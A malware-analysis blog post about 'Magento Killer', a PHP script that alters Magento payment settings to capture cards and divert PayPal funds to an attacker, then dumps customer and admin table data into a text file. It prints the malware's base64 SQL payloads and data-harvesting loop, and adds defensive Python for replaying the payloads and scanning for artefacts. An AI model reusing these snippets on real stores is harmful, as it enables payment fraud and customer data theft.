Magento Killer

July 10, 2019, by Luke Leal


A malicious PHP script, aptly given the name “Magento Killer” by its creator(s), has been found targeting Magento websites.

While it doesn’t actually kill the Magento installation, it does allow the attacker to modify data in the core_config_data table of the targeted Magento database.

$ConfKiller: Malicious Operations Used to Steal Payment Info

In the first stage of the attack, the script runs two SQL UPDATE statements against the Magento database. Both are stored in the script as base64 strings, so a casual grep for "core_config_data" or "ccsave" would not find them.

We’ve decoded these strings under their respective lines in the sample below for your reference:

$ConfKiller = array(
    'Update DB (Savecc)' =>
        base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQNCmBzY29wZWAgPSAnZGVmYXVsdCcsDQpgc2NvcGVfaWRgID0gJzAnLA0KYHBhdGhgID0gJ3BheW1lbnQvY2NzYXZlL2FjdGl2ZScsDQpgdmFsdWVgID0gJzEnDQpXSEVSRSBgcGF0aGAgPSAncGF5bWVudC9jY3NhdmUvYWN0aXZlJzs='),
        // UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'payment/ccsave/active', `value` = '1' WHERE `path` = 'payment/ccsave/active';
    'Update PP (MailPP)' =>
        base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQKYHNjb3BlYCA9ICdkZWZhdWx0JywKYHNjb3BlX2lkYCA9ICcwJywKYHBhdGhgID0gJ3BheXBhbC9nZW5lcmFsL2J1c2luZXNzX2FjY291bnQnLApgdmFsdWVgID0gJ1tyZWRhY3RlZF1AZ21haWwuY29tJwpXSEVSRSBgcGF0aGAgPSAncGF5cGFsL2dlbmVyYWwvYnVzaW5lc3NfYWNjb3VudCc7')
        // UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'paypal/general/business_account', `value` = '[redacted]@gmail.com' WHERE `path` = 'paypal/general/business_account';
);

The two entries in the $ConfKiller array perform the following operations, which together enable payment information theft from a compromised Magento website:

  • Update DB (Savecc): Sets payment/ccsave/active to 1, which turns on Magento's built-in "Saved CC" payment method. With it enabled, the store accepts card numbers directly and stores them (encrypted) in its own database instead of handing them to the usual destination, a payment gateway such as Authorize.Net.
  • Update PP (MailPP): Overwrites paypal/general/business_account, the PayPal merchant account the store is paid into, with an address the attacker controls, so PayPal payments are diverted to the attacker.
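To see the effect of these two statements end to end, the following added example (not code from the post or from the malware sample) decodes the base64 payloads, pulls out the config path and value each one writes, and then replays the statements against a throwaway SQLite copy of core_config_data so the before/after difference can be diffed. The base64 strings are the ones quoted above; the seed rows, including the merchant@example.com PayPal account and the Authorize.Net row, are constructed for the demonstration.

```python
"""Decode the $ConfKiller payloads and replay them against a throwaway copy of
core_config_data to see exactly which settings the attacker flips.

Added example; not part of the Sucuri write-up or of the malware sample.
Seed rows and the merchant address are constructed for illustration."""
import base64
import re
import sqlite3

# Base64 strings copied verbatim from the $ConfKiller array in the sample.
CONFKILLER_B64 = {
    "Update DB (Savecc)": (
        "VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQNCmBzY29wZWAgPSAnZGVmYXVsdCcsDQpgc2NvcGVfaWRg"
        "ID0gJzAnLA0KYHBhdGhgID0gJ3BheW1lbnQvY2NzYXZlL2FjdGl2ZScsDQpgdmFsdWVgID0gJzEnDQpXSEVS"
        "RSBgcGF0aGAgPSAncGF5bWVudC9jY3NhdmUvYWN0aXZlJzs="
    ),
    "Update PP (MailPP)": (
        "VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQKYHNjb3BlYCA9ICdkZWZhdWx0JywKYHNjb3BlX2lkYCA9"
        "ICcwJywKYHBhdGhgID0gJ3BheXBhbC9nZW5lcmFsL2J1c2luZXNzX2FjY291bnQnLApgdmFsdWVgID0gJ1ty"
        "ZWRhY3RlZF1AZ21haWwuY29tJwpXSEVSRSBgcGF0aGAgPSAncGF5cGFsL2dlbmVyYWwvYnVzaW5lc3NfYWNj"
        "b3VudCc7"
    ),
}

# One `column` = 'value' pair inside the SET clause, e.g. `path` = 'payment/ccsave/active'.
ASSIGN_RE = re.compile(r"`(\w+)`\s*=\s*'([^']*)'")


def decode_payloads(payloads=CONFKILLER_B64):
    """Return {label: plaintext SQL} for every base64 entry."""
    return {label: base64.b64decode(b64).decode("utf-8") for label, b64 in payloads.items()}


def targeted_settings(sql):
    """Return (config path, new value) written by one UPDATE statement.
    Only the SET clause is inspected; the WHERE clause repeats the path."""
    set_clause = re.search(r"\bSET\b(.*?)\bWHERE\b", sql, re.IGNORECASE | re.DOTALL).group(1)
    assignments = dict(ASSIGN_RE.findall(set_clause))
    return assignments["path"], assignments["value"]


def seed_config(conn):
    """Constructed stand-in for a clean Magento 1 core_config_data table."""
    conn.execute(
        "CREATE TABLE core_config_data (config_id INTEGER PRIMARY KEY, "
        "scope TEXT, scope_id INTEGER, path TEXT, value TEXT)"
    )
    conn.executemany(
        "INSERT INTO core_config_data (scope, scope_id, path, value) VALUES (?, ?, ?, ?)",
        [
            ("default", 0, "payment/ccsave/active", "0"),                            # Saved CC off, as shipped
            ("default", 0, "payment/authorizenet/active", "1"),                      # constructed: gateway in use
            ("default", 0, "paypal/general/business_account", "merchant@example.com"),  # constructed merchant
            ("default", 0, "general/store_information/name", "Example Store"),       # constructed, untouched
        ],
    )


def snapshot(conn):
    """{path: value} for every config row; paths are unique in the seed data."""
    return dict(conn.execute("SELECT path, value FROM core_config_data"))


def replay_and_diff(payloads=CONFKILLER_B64):
    """Run the decoded statements against the seeded table and return
    {path: (old_value, new_value)} for every row the attacker changed."""
    conn = sqlite3.connect(":memory:")
    seed_config(conn)
    before = snapshot(conn)
    for sql in decode_payloads(payloads).values():
        # SQLite accepts MySQL-style backtick identifiers; drop the trailing ';'
        conn.execute(sql.strip().rstrip(";"))
    after = snapshot(conn)
    return {path: (before[path], after[path]) for path in before if before[path] != after[path]}


if __name__ == "__main__":
    for label, sql in decode_payloads().items():
        path, value = targeted_settings(sql)
        print(f"{label}: sets {path!r} to {value!r}")
    for path, (old, new) in replay_and_diff().items():
        print(f"changed {path}: {old!r} -> {new!r}")
```

The diff is the check a responder wants on a live store: a non-zero payment/ccsave/active on a shop that uses a gateway, or a paypal/general/business_account that is not the merchant's, is a strong indicator even if the dropper itself has already been removed.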

Magento does encrypt the locally saved card data, but that offers little protection in this scenario.

The attacker already has access to the website's filesystem (the script had to be uploaded somehow), so they can read the encryption key from the <crypt><key> node of ./app/etc/local.xml. With that key, the stored card numbers decrypt to plaintext, ready to be used for fraudulent transactions or sold on.

SQL Queries Used to Steal Data from Magento Databases

In order to realistically use the stolen payment data, the hacker must also steal the customer information from the database. They’ll be looking for the correct name, email address, physical mailing address, and other billing information associated with the stolen credit card.

To collect this additional information, the script defines a second array of SQL queries that it runs against the compromised Magento database:

$query = array(
    'admin_user'                  => 'SELECT * FROM admin_user' ,
    'aw_blog_comment'             => 'SELECT * FROM aw_blog_comment' ,
    'core_email_queue_recipients' => 'SELECT * FROM core_email_queue_recipients' ,
    'customer_entity'             => 'SELECT * FROM customer_entity' ,
    // ... further tables omitted here for brevity
);

The array listing has been shortened for brevity, but it pulls customer information from the most common Magento tables (e.g. customer_entity, newsletter_subscriber), plus admin_user, which gives the attacker the store's administrator records as well.

It then trims this data, keeping only the single column per table that is useful for fraudulent purchases. Finally, it appends the results to a *-shcMail.txt file (the prefix is md5(time()), 32 hex characters) in the directory the script runs from.

$namefile = md5(time())."-shcMail.txt";       // 32 hex characters + "-shcMail.txt", written to the working directory
foreach ($query as $shc_key => $shc_query) {
    $hasil = mysql_query($shc_query);         // legacy mysql_* API (removed in PHP 7), so this targets old Magento 1 hosts
    while ( $kolom_db = mysql_fetch_assoc($hasil) ) {
        // $shcolom (defined elsewhere in the script, not shown in the post) maps each table name to the one column kept
        $mail[] = $kolom_db[$shcolom[$shc_key]];
        $myfile = fopen($namefile, "a+") or die("Unable to open file!");
        fwrite($myfile, $kolom_db[$shcolom[$shc_key]]."\r\n");
        fclose($myfile);
    }
}

When the script is requested through a web browser, it simply outputs a hyperlink to the generated *-shcMail.txt file, then reports whether the two configuration changes above succeeded.
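For incident responders, the two artefacts worth sweeping a document root for are the dump file (32 hex characters of md5(time()) followed by -shcMail.txt) and the dropper script itself. The added example below is not from the post or the sample: it builds a small constructed directory tree with one clean PHP file, one dump file, one dropper and one unrelated text file, then scans it. The marker strings come from the code quoted above; the base64 prefix is the encoding of "UPDATE `core_config_data` S", which both payloads share.

```python
"""Sweep a Magento document root for the artefacts the "Magento Killer" script
leaves behind: the *-shcMail.txt dump and the dropper itself.

Added example; not part of the Sucuri write-up or of the malware sample.
The directory tree built by build_constructed_tree() is fabricated for the demo."""
import os
import re
import tempfile
from pathlib import Path

# md5(time()) is 32 hex characters, so the dump is named <32 hex>-shcMail.txt
DUMP_NAME_RE = re.compile(r"^[0-9a-f]{32}-shcMail\.txt$")

# Strings lifted from the sample that should not appear in legitimate Magento code.
# The base64 fragment is "UPDATE `core_config_data` S", the prefix both payloads share.
SCRIPT_MARKERS = (
    b"ConfKiller",
    b"shcMail",
    b"base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBT",
)

PHP_SUFFIXES = {".php", ".phtml"}


def scan_docroot(root):
    """Return sorted (kind, path, marker_hits) tuples for every suspicious file."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = Path(dirpath, name)
            if DUMP_NAME_RE.match(name):
                findings.append(("exfil_dump", str(path), []))
                continue
            if path.suffix.lower() in PHP_SUFFIXES:
                data = path.read_bytes()
                hits = [m.decode() for m in SCRIPT_MARKERS if m in data]
                if hits:
                    findings.append(("dropper_script", str(path), hits))
    return sorted(findings)


def build_constructed_tree(root):
    """Fabricate a tiny document root: clean bootstrap, dump, dropper, unrelated note."""
    root = Path(root)
    (root / "app").mkdir(parents=True)
    (root / "app" / "Mage.php").write_text("<?php\n// constructed stand-in for a clean file\n")
    (root / "media").mkdir()
    (root / "media" / ("a" * 32 + "-shcMail.txt")).write_text("jane@example.com\r\n")  # constructed
    (root / "skin").mkdir()
    (root / "skin" / "cache.php").write_text(                                          # constructed dropper
        "<?php\n$ConfKiller = array('Update DB (Savecc)' => "
        "base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBT'));\n"  # payload truncated for the demo
        "$namefile = md5(time()).'-shcMail.txt';\n"
    )
    (root / "var").mkdir()
    (root / "var" / "report.txt").write_text("shcMail mentioned in a note, not PHP\n")  # must not match


def run_demo():
    """Build the constructed tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_constructed_tree(tmp)
        return scan_docroot(tmp)


if __name__ == "__main__":
    for kind, path, hits in run_demo():
        print(f"{kind}: {path} {hits}")
```

Run the scanner against the real document root (and any writable upload or cache directories) rather than the constructed tree; the marker list is deliberately narrow so it can be extended with whatever strings the specific sample on a host uses.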

Conclusion

If you believe your Magento installation has been compromised, you can use our step-by-step guide on how to identify and clean up a hacked Magento website.

We also offer affordable website security plans and remediation services, and would be happy to help lend a hand.


Categories: Ecommerce Security, Magento Security, Sucuri, Website SecurityTags: Black Hat Tactics, Hacked Websites

About Luke Leal

Luke Leal is a member of the Malware Research team and joined the company in 2015. Luke's main responsibilities include threat research and malware analysis, which is used to improve our tools. His professional experience covers over eight years of deobfuscating malware code and using unique data from it to help in correlating patterns. When he’s not researching infosec issues or working on websites, you might find Luke traveling and learning about new things. Connect with him on Twitter.
